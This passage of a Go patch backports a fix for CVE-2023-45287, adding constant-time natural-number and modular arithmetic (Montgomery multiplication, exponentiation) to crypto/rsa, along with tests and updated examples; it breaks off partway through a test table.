35Keep in mind that this is without any assembly at all, and that further
36improvements are likely possible. I think having a review of the logic
37and the cryptography would be a good idea at this stage, before we
38complicate the code too much through optimization.
39
40The bulk of the work is in nat.go. This introduces two new types: nat,
41representing natural numbers, and modulus, representing moduli used in
42modular arithmetic.
43
44A nat has an "announced size", which may be larger than its "true size",
45the number of bits needed to represent this number. Operations on a nat
46will only ever leak its announced size, never its true size, or other
47information about its value. The size of a nat is always clear based on
48how its value is set. For example, x.mod(y, m) will make the announced
49size of x match that of m, since x is reduced modulo m.
50
51Operations assume that the announced size of the operands match what's
52expected (with a few exceptions). For example, x.modAdd(y, m) assumes
53that x and y have the same announced size as m, and that they're reduced
54modulo m.
55
56Nats are represented over unsatured bits.UintSize - 1 bit limbs. This
57means that we can't reuse the assembly routines for big.Int, which use
58saturated bits.UintSize limbs. The advantage of unsaturated limbs is
59that it makes Montgomery multiplication faster, by needing fewer
60registers in a hot loop. This makes exponentiation faster, which
61consists of many Montgomery multiplications.
62
63Moduli use nat internally. Unlike nat, the true size of a modulus always
64matches its announced size. When creating a modulus, any zero padding is
65removed. Moduli will also precompute constants when created, which is
66another reason why having a separate type is desirable.
67
68Updates #20654
69
70Co-authored-by: Filippo Valsorda <filippo@golang.org>
71Change-Id: I73b61f87d58ab912e80a9644e255d552cbadcced
72Reviewed-on: https://go-review.googlesource.com/c/go/+/326012
73Run-TryBot: Filippo Valsorda <filippo@golang.org>
74TryBot-Result: Gopher Robot <gobot@golang.org>
75Reviewed-by: Roland Shoemaker <roland@golang.org>
76Reviewed-by: Joedian Reid <joedian@golang.org>
77
78Upstream-Status: Backport [https://github.com/golang/go/commit/8a81fdf165facdcefa06531de5af98a4db343035]
79CVE: CVE-2023-45287
80Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
81---
82 src/crypto/rsa/example_test.go | 21 +-
83 src/crypto/rsa/nat.go | 626 +++++++++++++++++++++++++++++++++
84 src/crypto/rsa/nat_test.go | 384 ++++++++++++++++++++
85 src/crypto/rsa/pkcs1v15.go | 47 +--
86 src/crypto/rsa/pss.go | 50 ++-
87 src/crypto/rsa/pss_test.go | 10 +-
88 src/crypto/rsa/rsa.go | 174 ++++-----
89 7 files changed, 1143 insertions(+), 169 deletions(-)
90 create mode 100644 src/crypto/rsa/nat.go
91 create mode 100644 src/crypto/rsa/nat_test.go
92
93diff --git a/src/crypto/rsa/example_test.go b/src/crypto/rsa/example_test.go
94index 1435b70..1963609 100644
95--- a/src/crypto/rsa/example_test.go
96+++ b/src/crypto/rsa/example_test.go
97@@ -12,7 +12,6 @@ import (
98 "crypto/sha256"
99 "encoding/hex"
100 "fmt"
101- "io"
102 "os"
103 )
104
105@@ -36,21 +35,17 @@ import (
106 // a buffer that contains a random key. Thus, if the RSA result isn't
107 // well-formed, the implementation uses a random key in constant time.
108 func ExampleDecryptPKCS1v15SessionKey() {
109- // crypto/rand.Reader is a good source of entropy for blinding the RSA
110- // operation.
111- rng := rand.Reader
112-
113 // The hybrid scheme should use at least a 16-byte symmetric key. Here
114 // we read the random key that will be used if the RSA decryption isn't
115 // well-formed.
116 key := make([]byte, 32)
117- if _, err := io.ReadFull(rng, key); err != nil {
118+ if _, err := rand.Read(key); err != nil {
119 panic("RNG failure")
120 }
121
122 rsaCiphertext, _ := hex.DecodeString("aabbccddeeff")
123
124- if err := DecryptPKCS1v15SessionKey(rng, rsaPrivateKey, rsaCiphertext, key); err != nil {
125+ if err := DecryptPKCS1v15SessionKey(nil, rsaPrivateKey, rsaCiphertext, key); err != nil {
126 // Any errors that result will be “public” – meaning that they
127 // can be determined without any secret information. (For
128 // instance, if the length of key is impossible given the RSA
129@@ -86,10 +81,6 @@ func ExampleDecryptPKCS1v15SessionKey() {
130 }
131
132 func ExampleSignPKCS1v15() {
133- // crypto/rand.Reader is a good source of entropy for blinding the RSA
134- // operation.
135- rng := rand.Reader
136-
137 message := []byte("message to be signed")
138
139 // Only small messages can be signed directly; thus the hash of a
140@@ -99,7 +90,7 @@ func ExampleSignPKCS1v15() {
141 // of writing (2016).
142 hashed := sha256.Sum256(message)
143
144- signature, err := SignPKCS1v15(rng, rsaPrivateKey, crypto.SHA256, hashed[:])
145+ signature, err := SignPKCS1v15(nil, rsaPrivateKey, crypto.SHA256, hashed[:])
146 if err != nil {
147 fmt.Fprintf(os.Stderr, "Error from signing: %s\n", err)
148 return
149@@ -151,11 +142,7 @@ func ExampleDecryptOAEP() {
150 ciphertext, _ := hex.DecodeString("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")
151 label := []byte("orders")
152
153- // crypto/rand.Reader is a good source of entropy for blinding the RSA
154- // operation.
155- rng := rand.Reader
156-
157- plaintext, err := DecryptOAEP(sha256.New(), rng, test2048Key, ciphertext, label)
158+ plaintext, err := DecryptOAEP(sha256.New(), nil, test2048Key, ciphertext, label)
159 if err != nil {
160 fmt.Fprintf(os.Stderr, "Error from decryption: %s\n", err)
161 return
162diff --git a/src/crypto/rsa/nat.go b/src/crypto/rsa/nat.go
163new file mode 100644
164index 0000000..da521c2
165--- /dev/null
166+++ b/src/crypto/rsa/nat.go
167@@ -0,0 +1,626 @@
168+// Copyright 2021 The Go Authors. All rights reserved.
169+// Use of this source code is governed by a BSD-style
170+// license that can be found in the LICENSE file.
171+
172+package rsa
173+
174+import (
175+ "math/big"
176+ "math/bits"
177+)
178+
179+const (
180+ // _W is the number of bits we use for our limbs.
181+ _W = bits.UintSize - 1
182+ // _MASK selects _W bits from a full machine word.
183+ _MASK = (1 << _W) - 1
184+)
185+
186+// choice represents a constant-time boolean. The value of choice is always
187+// either 1 or 0. We use an int instead of bool in order to make decisions in
188+// constant time by turning it into a mask.
189+type choice uint
190+
191+func not(c choice) choice { return 1 ^ c }
192+
193+const yes = choice(1)
194+const no = choice(0)
195+
196+// ctSelect returns x if on == 1, and y if on == 0. The execution time of this
197+// function does not depend on its inputs. If on is any value besides 1 or 0,
198+// the result is undefined.
199+func ctSelect(on choice, x, y uint) uint {
200+ // When on == 1, mask is 0b111..., otherwise mask is 0b000...
201+ mask := -uint(on)
202+ // When mask is all zeros, we just have y, otherwise, y cancels with itself.
203+ return y ^ (mask & (y ^ x))
204+}
205+
206+// ctEq returns 1 if x == y, and 0 otherwise. The execution time of this
207+// function does not depend on its inputs.
208+func ctEq(x, y uint) choice {
209+ // If x != y, then either x - y or y - x will generate a carry.
210+ _, c1 := bits.Sub(x, y, 0)
211+ _, c2 := bits.Sub(y, x, 0)
212+ return not(choice(c1 | c2))
213+}
214+
215+// ctGeq returns 1 if x >= y, and 0 otherwise. The execution time of this
216+// function does not depend on its inputs.
217+func ctGeq(x, y uint) choice {
218+ // If x < y, then x - y generates a carry.
219+ _, carry := bits.Sub(x, y, 0)
220+ return not(choice(carry))
221+}
222+
223+// nat represents an arbitrary natural number
224+//
225+// Each nat has an announced length, which is the number of limbs it has stored.
226+// Operations on this number are allowed to leak this length, but will not leak
227+// any information about the values contained in those limbs.
228+type nat struct {
229+ // limbs is a little-endian representation in base 2^W with
230+ // W = bits.UintSize - 1. The top bit is always unset between operations.
231+ //
232+ // The top bit is left unset to optimize Montgomery multiplication, in the
233+ // inner loop of exponentiation. Using fully saturated limbs would leave us
234+ // working with 129-bit numbers on 64-bit platforms, wasting a lot of space,
235+ // and thus time.
236+ limbs []uint
237+}
238+
239+// expand expands x to n limbs, leaving its value unchanged.
240+func (x *nat) expand(n int) *nat {
241+ for len(x.limbs) > n {
242+ if x.limbs[len(x.limbs)-1] != 0 {
243+ panic("rsa: internal error: shrinking nat")
244+ }
245+ x.limbs = x.limbs[:len(x.limbs)-1]
246+ }
247+ if cap(x.limbs) < n {
248+ newLimbs := make([]uint, n)
249+ copy(newLimbs, x.limbs)
250+ x.limbs = newLimbs
251+ return x
252+ }
253+ extraLimbs := x.limbs[len(x.limbs):n]
254+ for i := range extraLimbs {
255+ extraLimbs[i] = 0
256+ }
257+ x.limbs = x.limbs[:n]
258+ return x
259+}
260+
261+// reset returns a zero nat of n limbs, reusing x's storage if n <= cap(x.limbs).
262+func (x *nat) reset(n int) *nat {
263+ if cap(x.limbs) < n {
264+ x.limbs = make([]uint, n)
265+ return x
266+ }
267+ for i := range x.limbs {
268+ x.limbs[i] = 0
269+ }
270+ x.limbs = x.limbs[:n]
271+ return x
272+}
273+
274+// clone returns a new nat, with the same value and announced length as x.
275+func (x *nat) clone() *nat {
276+ out := &nat{make([]uint, len(x.limbs))}
277+ copy(out.limbs, x.limbs)
278+ return out
279+}
280+
281+// natFromBig creates a new natural number from a big.Int.
282+//
283+// The announced length of the resulting nat is based on the actual bit size of
284+// the input, ignoring leading zeroes.
285+func natFromBig(x *big.Int) *nat {
286+ xLimbs := x.Bits()
287+ bitSize := bigBitLen(x)
288+ requiredLimbs := (bitSize + _W - 1) / _W
289+
290+ out := &nat{make([]uint, requiredLimbs)}
291+ outI := 0
292+ shift := 0
293+ for i := range xLimbs {
294+ xi := uint(xLimbs[i])
295+ out.limbs[outI] |= (xi << shift) & _MASK
296+ outI++
297+ if outI == requiredLimbs {
298+ return out
299+ }
300+ out.limbs[outI] = xi >> (_W - shift)
301+ shift++ // this assumes bits.UintSize - _W = 1
302+ if shift == _W {
303+ shift = 0
304+ outI++
305+ }
306+ }
307+ return out
308+}
309+
310+// fillBytes sets bytes to x as a zero-extended big-endian byte slice.
311+//
312+// If bytes is not long enough to contain the number or at least len(x.limbs)-1
313+// limbs, or has zero length, fillBytes will panic.
314+func (x *nat) fillBytes(bytes []byte) []byte {
315+ if len(bytes) == 0 {
316+ panic("nat: fillBytes invoked with too small buffer")
317+ }
318+ for i := range bytes {
319+ bytes[i] = 0
320+ }
321+ shift := 0
322+ outI := len(bytes) - 1
323+ for i, limb := range x.limbs {
324+ remainingBits := _W
325+ for remainingBits >= 8 {
326+ bytes[outI] |= byte(limb) << shift
327+ consumed := 8 - shift
328+ limb >>= consumed
329+ remainingBits -= consumed
330+ shift = 0
331+ outI--
332+ if outI < 0 {
333+ if limb != 0 || i < len(x.limbs)-1 {
334+ panic("nat: fillBytes invoked with too small buffer")
335+ }
336+ return bytes
337+ }
338+ }
339+ bytes[outI] = byte(limb)
340+ shift = remainingBits
341+ }
342+ return bytes
343+}
344+
345+// natFromBytes converts a slice of big-endian bytes into a nat.
346+//
347+// The announced length of the output depends on the length of bytes. Unlike
348+// big.Int, creating a nat will not remove leading zeros.
349+func natFromBytes(bytes []byte) *nat {
350+ bitSize := len(bytes) * 8
351+ requiredLimbs := (bitSize + _W - 1) / _W
352+
353+ out := &nat{make([]uint, requiredLimbs)}
354+ outI := 0
355+ shift := 0
356+ for i := len(bytes) - 1; i >= 0; i-- {
357+ bi := bytes[i]
358+ out.limbs[outI] |= uint(bi) << shift
359+ shift += 8
360+ if shift >= _W {
361+ shift -= _W
362+ out.limbs[outI] &= _MASK
363+ outI++
364+ if shift > 0 {
365+ out.limbs[outI] = uint(bi) >> (8 - shift)
366+ }
367+ }
368+ }
369+ return out
370+}
371+
372+// cmpEq returns 1 if x == y, and 0 otherwise.
373+//
374+// Both operands must have the same announced length.
375+func (x *nat) cmpEq(y *nat) choice {
376+ // Eliminate bounds checks in the loop.
377+ size := len(x.limbs)
378+ xLimbs := x.limbs[:size]
379+ yLimbs := y.limbs[:size]
380+
381+ equal := yes
382+ for i := 0; i < size; i++ {
383+ equal &= ctEq(xLimbs[i], yLimbs[i])
384+ }
385+ return equal
386+}
387+
388+// cmpGeq returns 1 if x >= y, and 0 otherwise.
389+//
390+// Both operands must have the same announced length.
391+func (x *nat) cmpGeq(y *nat) choice {
392+ // Eliminate bounds checks in the loop.
393+ size := len(x.limbs)
394+ xLimbs := x.limbs[:size]
395+ yLimbs := y.limbs[:size]
396+
397+ var c uint
398+ for i := 0; i < size; i++ {
399+ c = (xLimbs[i] - yLimbs[i] - c) >> _W
400+ }
401+ // If there was a carry, then subtracting y underflowed, so
402+ // x is not greater than or equal to y.
403+ return not(choice(c))
404+}
405+
406+// assign sets x <- y if on == 1, and does nothing otherwise.
407+//
408+// Both operands must have the same announced length.
409+func (x *nat) assign(on choice, y *nat) *nat {
410+ // Eliminate bounds checks in the loop.
411+ size := len(x.limbs)
412+ xLimbs := x.limbs[:size]
413+ yLimbs := y.limbs[:size]
414+
415+ for i := 0; i < size; i++ {
416+ xLimbs[i] = ctSelect(on, yLimbs[i], xLimbs[i])
417+ }
418+ return x
419+}
420+
421+// add computes x += y if on == 1, and does nothing otherwise. It returns the
422+// carry of the addition regardless of on.
423+//
424+// Both operands must have the same announced length.
425+func (x *nat) add(on choice, y *nat) (c uint) {
426+ // Eliminate bounds checks in the loop.
427+ size := len(x.limbs)
428+ xLimbs := x.limbs[:size]
429+ yLimbs := y.limbs[:size]
430+
431+ for i := 0; i < size; i++ {
432+ res := xLimbs[i] + yLimbs[i] + c
433+ xLimbs[i] = ctSelect(on, res&_MASK, xLimbs[i])
434+ c = res >> _W
435+ }
436+ return
437+}
438+
439+// sub computes x -= y if on == 1, and does nothing otherwise. It returns the
440+// borrow of the subtraction regardless of on.
441+//
442+// Both operands must have the same announced length.
443+func (x *nat) sub(on choice, y *nat) (c uint) {
444+ // Eliminate bounds checks in the loop.
445+ size := len(x.limbs)
446+ xLimbs := x.limbs[:size]
447+ yLimbs := y.limbs[:size]
448+
449+ for i := 0; i < size; i++ {
450+ res := xLimbs[i] - yLimbs[i] - c
451+ xLimbs[i] = ctSelect(on, res&_MASK, xLimbs[i])
452+ c = res >> _W
453+ }
454+ return
455+}
456+
457+// modulus is used for modular arithmetic, precomputing relevant constants.
458+//
459+// Moduli are assumed to be odd numbers. Moduli can also leak the exact
460+// number of bits needed to store their value, and are stored without padding.
461+//
462+// Their actual value is still kept secret.
463+type modulus struct {
464+ // The underlying natural number for this modulus.
465+ //
466+ // This will be stored without any padding, and shouldn't alias with any
467+ // other natural number being used.
468+ nat *nat
469+ leading int // number of leading zeros in the modulus
470+ m0inv uint // -nat.limbs[0]⁻¹ mod _W
471+}
472+
473+// minusInverseModW computes -x⁻¹ mod _W with x odd.
474+//
475+// This operation is used to precompute a constant involved in Montgomery
476+// multiplication.
477+func minusInverseModW(x uint) uint {
478+ // Every iteration of this loop doubles the least-significant bits of
479+ // correct inverse in y. The first three bits are already correct (1⁻¹ = 1,
480+ // 3⁻¹ = 3, 5⁻¹ = 5, and 7⁻¹ = 7 mod 8), so doubling five times is enough
481+ // for 61 bits (and wastes only one iteration for 31 bits).
482+ //
483+ // See https://crypto.stackexchange.com/a/47496.
484+ y := x
485+ for i := 0; i < 5; i++ {
486+ y = y * (2 - x*y)
487+ }
488+ return (1 << _W) - (y & _MASK)
489+}
490+
491+// modulusFromNat creates a new modulus from a nat.
492+//
493+// The nat should be odd, nonzero, and the number of significant bits in the
494+// number should be leakable. The nat shouldn't be reused.
495+func modulusFromNat(nat *nat) *modulus {
496+ m := &modulus{}
497+ m.nat = nat
498+ size := len(m.nat.limbs)
499+ for m.nat.limbs[size-1] == 0 {
500+ size--
501+ }
502+ m.nat.limbs = m.nat.limbs[:size]
503+ m.leading = _W - bitLen(m.nat.limbs[size-1])
504+ m.m0inv = minusInverseModW(m.nat.limbs[0])
505+ return m
506+}
507+
508+// bitLen is a version of bits.Len that only leaks the bit length of n, but not
509+// its value. bits.Len and bits.LeadingZeros use a lookup table for the
510+// low-order bits on some architectures.
511+func bitLen(n uint) int {
512+ var len int
513+ // We assume, here and elsewhere, that comparison to zero is constant time
514+ // with respect to different non-zero values.
515+ for n != 0 {
516+ len++
517+ n >>= 1
518+ }
519+ return len
520+}
521+
522+// bigBitLen is a version of big.Int.BitLen that only leaks the bit length of x,
523+// but not its value. big.Int.BitLen uses bits.Len.
524+func bigBitLen(x *big.Int) int {
525+ xLimbs := x.Bits()
526+ fullLimbs := len(xLimbs) - 1
527+ topLimb := uint(xLimbs[len(xLimbs)-1])
528+ return fullLimbs*bits.UintSize + bitLen(topLimb)
529+}
530+
531+// modulusSize returns the size of m in bytes.
532+func modulusSize(m *modulus) int {
533+ bits := len(m.nat.limbs)*_W - int(m.leading)
534+ return (bits + 7) / 8
535+}
536+
537+// shiftIn calculates x = x << _W + y mod m.
538+//
539+// This assumes that x is already reduced mod m, and that y < 2^_W.
540+func (x *nat) shiftIn(y uint, m *modulus) *nat {
541+ d := new(nat).resetFor(m)
542+
543+ // Eliminate bounds checks in the loop.
544+ size := len(m.nat.limbs)
545+ xLimbs := x.limbs[:size]
546+ dLimbs := d.limbs[:size]
547+ mLimbs := m.nat.limbs[:size]
548+
549+ // Each iteration of this loop computes x = 2x + b mod m, where b is a bit
550+ // from y. Effectively, it left-shifts x and adds y one bit at a time,
551+ // reducing it every time.
552+ //
553+ // To do the reduction, each iteration computes both 2x + b and 2x + b - m.
554+ // The next iteration (and finally the return line) will use either result
555+ // based on whether the subtraction underflowed.
556+ needSubtraction := no
557+ for i := _W - 1; i >= 0; i-- {
558+ carry := (y >> i) & 1
559+ var borrow uint
560+ for i := 0; i < size; i++ {
561+ l := ctSelect(needSubtraction, dLimbs[i], xLimbs[i])
562+
563+ res := l<<1 + carry
564+ xLimbs[i] = res & _MASK
565+ carry = res >> _W
566+
567+ res = xLimbs[i] - mLimbs[i] - borrow
568+ dLimbs[i] = res & _MASK
569+ borrow = res >> _W
570+ }
571+ // See modAdd for how carry (aka overflow), borrow (aka underflow), and
572+ // needSubtraction relate.
573+ needSubtraction = ctEq(carry, borrow)
574+ }
575+ return x.assign(needSubtraction, d)
576+}
577+
578+// mod calculates out = x mod m.
579+//
580+// This works regardless how large the value of x is.
581+//
582+// The output will be resized to the size of m and overwritten.
583+func (out *nat) mod(x *nat, m *modulus) *nat {
584+ out.resetFor(m)
585+ // Working our way from the most significant to the least significant limb,
586+ // we can insert each limb at the least significant position, shifting all
587+ // previous limbs left by _W. This way each limb will get shifted by the
588+ // correct number of bits. We can insert at least N - 1 limbs without
589+ // overflowing m. After that, we need to reduce every time we shift.
590+ i := len(x.limbs) - 1
591+ // For the first N - 1 limbs we can skip the actual shifting and position
592+ // them at the shifted position, which starts at min(N - 2, i).
593+ start := len(m.nat.limbs) - 2
594+ if i < start {
595+ start = i
596+ }
597+ for j := start; j >= 0; j-- {
598+ out.limbs[j] = x.limbs[i]
599+ i--
600+ }
601+ // We shift in the remaining limbs, reducing modulo m each time.
602+ for i >= 0 {
603+ out.shiftIn(x.limbs[i], m)
604+ i--
605+ }
606+ return out
607+}
608+
609+// expandFor ensures out has the right size to work with operations modulo m.
610+//
611+// This assumes that out has as many or fewer limbs than m, or that the extra
612+// limbs are all zero (which may happen when decoding a value that has leading
613+// zeroes in its bytes representation that spill over the limb threshold).
614+func (out *nat) expandFor(m *modulus) *nat {
615+ return out.expand(len(m.nat.limbs))
616+}
617+
618+// resetFor ensures out has the right size to work with operations modulo m.
619+//
620+// out is zeroed and may start at any size.
621+func (out *nat) resetFor(m *modulus) *nat {
622+ return out.reset(len(m.nat.limbs))
623+}
624+
625+// modSub computes x = x - y mod m.
626+//
627+// The length of both operands must be the same as the modulus. Both operands
628+// must already be reduced modulo m.
629+func (x *nat) modSub(y *nat, m *modulus) *nat {
630+ underflow := x.sub(yes, y)
631+ // If the subtraction underflowed, add m.
632+ x.add(choice(underflow), m.nat)
633+ return x
634+}
635+
636+// modAdd computes x = x + y mod m.
637+//
638+// The length of both operands must be the same as the modulus. Both operands
639+// must already be reduced modulo m.
640+func (x *nat) modAdd(y *nat, m *modulus) *nat {
641+ overflow := x.add(yes, y)
642+ underflow := not(x.cmpGeq(m.nat)) // x < m
643+
644+ // Three cases are possible:
645+ //
646+ // - overflow = 0, underflow = 0
647+ //
648+ // In this case, addition fits in our limbs, but we can still subtract away
649+ // m without an underflow, so we need to perform the subtraction to reduce
650+ // our result.
651+ //
652+ // - overflow = 0, underflow = 1
653+ //
654+ // The addition fits in our limbs, but we can't subtract m without
655+ // underflowing. The result is already reduced.
656+ //
657+ // - overflow = 1, underflow = 1
658+ //
659+ // The addition does not fit in our limbs, and the subtraction's borrow
660+ // would cancel out with the addition's carry. We need to subtract m to
661+ // reduce our result.
662+ //
663+ // The overflow = 1, underflow = 0 case is not possible, because y is at
664+ // most m - 1, and if adding m - 1 overflows, then subtracting m must
665+ // necessarily underflow.
666+ needSubtraction := ctEq(overflow, uint(underflow))
667+
668+ x.sub(needSubtraction, m.nat)
669+ return x
670+}
671+
672+// montgomeryRepresentation calculates x = x * R mod m, with R = 2^(_W * n) and
673+// n = len(m.nat.limbs).
674+//
675+// Faster Montgomery multiplication replaces standard modular multiplication for
676+// numbers in this representation.
677+//
678+// This assumes that x is already reduced mod m.
679+func (x *nat) montgomeryRepresentation(m *modulus) *nat {
680+ for i := 0; i < len(m.nat.limbs); i++ {
681+ x.shiftIn(0, m) // x = x * 2^_W mod m
682+ }
683+ return x
684+}
685+
686+// montgomeryMul calculates d = a * b / R mod m, with R = 2^(_W * n) and
687+// n = len(m.nat.limbs), using the Montgomery Multiplication technique.
688+//
689+// All inputs should be the same length, not aliasing d, and already
690+// reduced modulo m. d will be resized to the size of m and overwritten.
691+func (d *nat) montgomeryMul(a *nat, b *nat, m *modulus) *nat {
692+ // See https://bearssl.org/bigint.html#montgomery-reduction-and-multiplication
693+ // for a description of the algorithm.
694+
695+ // Eliminate bounds checks in the loop.
696+ size := len(m.nat.limbs)
697+ aLimbs := a.limbs[:size]
698+ bLimbs := b.limbs[:size]
699+ dLimbs := d.resetFor(m).limbs[:size]
700+ mLimbs := m.nat.limbs[:size]
701+
702+ var overflow uint
703+ for i := 0; i < size; i++ {
704+ f := ((dLimbs[0] + aLimbs[i]*bLimbs[0]) * m.m0inv) & _MASK
705+ carry := uint(0)
706+ for j := 0; j < size; j++ {
707+ // z = d[j] + a[i] * b[j] + f * m[j] + carry <= 2^(2W+1) - 2^(W+1) + 2^W
708+ hi, lo := bits.Mul(aLimbs[i], bLimbs[j])
709+ z_lo, c := bits.Add(dLimbs[j], lo, 0)
710+ z_hi, _ := bits.Add(0, hi, c)
711+ hi, lo = bits.Mul(f, mLimbs[j])
712+ z_lo, c = bits.Add(z_lo, lo, 0)
713+ z_hi, _ = bits.Add(z_hi, hi, c)
714+ z_lo, c = bits.Add(z_lo, carry, 0)
715+ z_hi, _ = bits.Add(z_hi, 0, c)
716+ if j > 0 {
717+ dLimbs[j-1] = z_lo & _MASK
718+ }
719+ carry = z_hi<<1 | z_lo>>_W // carry <= 2^(W+1) - 2
720+ }
721+ z := overflow + carry // z <= 2^(W+1) - 1
722+ dLimbs[size-1] = z & _MASK
723+ overflow = z >> _W // overflow <= 1
724+ }
725+ // See modAdd for how overflow, underflow, and needSubtraction relate.
726+ underflow := not(d.cmpGeq(m.nat)) // d < m
727+ needSubtraction := ctEq(overflow, uint(underflow))
728+ d.sub(needSubtraction, m.nat)
729+
730+ return d
731+}
732+
733+// modMul calculates x *= y mod m.
734+//
735+// x and y must already be reduced modulo m, they must share its announced
736+// length, and they may not alias.
737+func (x *nat) modMul(y *nat, m *modulus) *nat {
738+ // A Montgomery multiplication by a value out of the Montgomery domain
739+ // takes the result out of Montgomery representation.
740+ xR := x.clone().montgomeryRepresentation(m) // xR = x * R mod m
741+ return x.montgomeryMul(xR, y, m) // x = xR * y / R mod m
742+}
743+
744+// exp calculates out = x^e mod m.
745+//
746+// The exponent e is represented in big-endian order. The output will be resized
747+// to the size of m and overwritten. x must already be reduced modulo m.
748+func (out *nat) exp(x *nat, e []byte, m *modulus) *nat {
749+ // We use a 4 bit window. For our RSA workload, 4 bit windows are faster
750+ // than 2 bit windows, but use an extra 12 nats worth of scratch space.
751+ // Using bit sizes that don't divide 8 are more complex to implement.
752+ table := make([]*nat, (1<<4)-1) // table[i] = x ^ (i+1)
753+ table[0] = x.clone().montgomeryRepresentation(m)
754+ for i := 1; i < len(table); i++ {
755+ table[i] = new(nat).expandFor(m)
756+ table[i].montgomeryMul(table[i-1], table[0], m)
757+ }
758+
759+ out.resetFor(m)
760+ out.limbs[0] = 1
761+ out.montgomeryRepresentation(m)
762+ t0 := new(nat).expandFor(m)
763+ t1 := new(nat).expandFor(m)
764+ for _, b := range e {
765+ for _, j := range []int{4, 0} {
766+ // Square four times.
767+ t1.montgomeryMul(out, out, m)
768+ out.montgomeryMul(t1, t1, m)
769+ t1.montgomeryMul(out, out, m)
770+ out.montgomeryMul(t1, t1, m)
771+
772+ // Select x^k in constant time from the table.
773+ k := uint((b >> j) & 0b1111)
774+ for i := range table {
775+ t0.assign(ctEq(k, uint(i+1)), table[i])
776+ }
777+
778+ // Multiply by x^k, discarding the result if k = 0.
779+ t1.montgomeryMul(out, t0, m)
780+ out.assign(not(ctEq(k, 0)), t1)
781+ }
782+ }
783+
784+ // By Montgomery multiplying with 1 not in Montgomery representation, we
785+ // convert out back from Montgomery representation, because it works out to
786+ // dividing by R.
787+ t0.assign(yes, out)
788+ t1.resetFor(m)
789+ t1.limbs[0] = 1
790+ out.montgomeryMul(t0, t1, m)
791+
792+ return out
793+}
794diff --git a/src/crypto/rsa/nat_test.go b/src/crypto/rsa/nat_test.go
795new file mode 100644
796index 0000000..3e6eb10
797--- /dev/null
798+++ b/src/crypto/rsa/nat_test.go
799@@ -0,0 +1,384 @@
800+// Copyright 2021 The Go Authors. All rights reserved.
801+// Use of this source code is governed by a BSD-style
802+// license that can be found in the LICENSE file.
803+
804+package rsa
805+
806+import (
807+ "bytes"
808+ "math/big"
809+ "math/bits"
810+ "math/rand"
811+ "reflect"
812+ "testing"
813+ "testing/quick"
814+)
815+
816+// Generate generates an even nat. It's used by testing/quick to produce random
817+// *nat values for quick.Check invocations.
818+func (*nat) Generate(r *rand.Rand, size int) reflect.Value {
819+ limbs := make([]uint, size)
820+ for i := 0; i < size; i++ {
821+ limbs[i] = uint(r.Uint64()) & ((1 << _W) - 2)
822+ }
823+ return reflect.ValueOf(&nat{limbs})
824+}
825+
826+func testModAddCommutative(a *nat, b *nat) bool {
827+ mLimbs := make([]uint, len(a.limbs))
828+ for i := 0; i < len(mLimbs); i++ {
829+ mLimbs[i] = _MASK
830+ }
831+ m := modulusFromNat(&nat{mLimbs})
832+ aPlusB := a.clone()
833+ aPlusB.modAdd(b, m)
834+ bPlusA := b.clone()
835+ bPlusA.modAdd(a, m)
836+ return aPlusB.cmpEq(bPlusA) == 1
837+}
838+
839+func TestModAddCommutative(t *testing.T) {
840+ err := quick.Check(testModAddCommutative, &quick.Config{})
841+ if err != nil {
842+ t.Error(err)
843+ }
844+}
845+
846+func testModSubThenAddIdentity(a *nat, b *nat) bool {
847+ mLimbs := make([]uint, len(a.limbs))
848+ for i := 0; i < len(mLimbs); i++ {
849+ mLimbs[i] = _MASK
850+ }
851+ m := modulusFromNat(&nat{mLimbs})
852+ original := a.clone()
853+ a.modSub(b, m)
854+ a.modAdd(b, m)
855+ return a.cmpEq(original) == 1
856+}
857+
858+func TestModSubThenAddIdentity(t *testing.T) {
859+ err := quick.Check(testModSubThenAddIdentity, &quick.Config{})
860+ if err != nil {
861+ t.Error(err)
862+ }
863+}
864+
865+func testMontgomeryRoundtrip(a *nat) bool {
866+ one := &nat{make([]uint, len(a.limbs))}
867+ one.limbs[0] = 1
868+ aPlusOne := a.clone()
869+ aPlusOne.add(1, one)
870+ m := modulusFromNat(aPlusOne)
871+ monty := a.clone()
872+ monty.montgomeryRepresentation(m)
873+ aAgain := monty.clone()
874+ aAgain.montgomeryMul(monty, one, m)
875+ return a.cmpEq(aAgain) == 1
876+}
877+
878+func TestMontgomeryRoundtrip(t *testing.T) {
879+ err := quick.Check(testMontgomeryRoundtrip, &quick.Config{})
880+ if err != nil {
881+ t.Error(err)
882+ }
883+}
884+
885+func TestFromBig(t *testing.T) {
886+ expected := []byte{0x01, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff}
887+ theBig := new(big.Int).SetBytes(expected)
888+ actual := natFromBig(theBig).fillBytes(make([]byte, len(expected)))
889+ if !bytes.Equal(actual, expected) {
890+ t.Errorf("%+x != %+x", actual, expected)
891+ }
892+}
893+
894+func TestFillBytes(t *testing.T) {
895+ xBytes := []byte{0xAA, 0xFF, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88}
896+ x := natFromBytes(xBytes)
897+ for l := 20; l >= len(xBytes); l-- {
898+ buf := make([]byte, l)
899+ rand.Read(buf)
900+ actual := x.fillBytes(buf)
901+ expected := make([]byte, l)
902+ copy(expected[l-len(xBytes):], xBytes)
903+ if !bytes.Equal(actual, expected) {
904+ t.Errorf("%d: %+v != %+v", l, actual, expected)
905+ }
906+ }
907+ for l := len(xBytes) - 1; l >= 0; l-- {
908+ (func() {
909+ defer func() {
910+ if recover() == nil {
911+ t.Errorf("%d: expected panic", l)
912+ }
913+ }()
914+ x.fillBytes(make([]byte, l))
915+ })()
916+ }
917+}
918+
919+func TestFromBytes(t *testing.T) {
920+ f := func(xBytes []byte) bool {
921+ if len(xBytes) == 0 {
922+ return true
923+ }
924+ actual := natFromBytes(xBytes).fillBytes(make([]byte, len(xBytes)))
925+ if !bytes.Equal(actual, xBytes) {
926+ t.Errorf("%+x != %+x", actual, xBytes)
927+ return false
928+ }
929+ return true
930+ }
931+
932+ err := quick.Check(f, &quick.Config{})
933+ if err != nil {
934+ t.Error(err)
935+ }
936+
937+ f([]byte{0xFF, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88})
938+ f(bytes.Repeat([]byte{0xFF}, _W))
939+}
940+
941+func TestShiftIn(t *testing.T) {
942+ if bits.UintSize != 64 {
943+ t.Skip("examples are only valid in 64 bit")
944+ }
945+ examples := []struct {
946+ m, x, expected []byte
947+ y uint64
948+ }{{
949+ m: []byte{13},
950+ x: []byte{0},
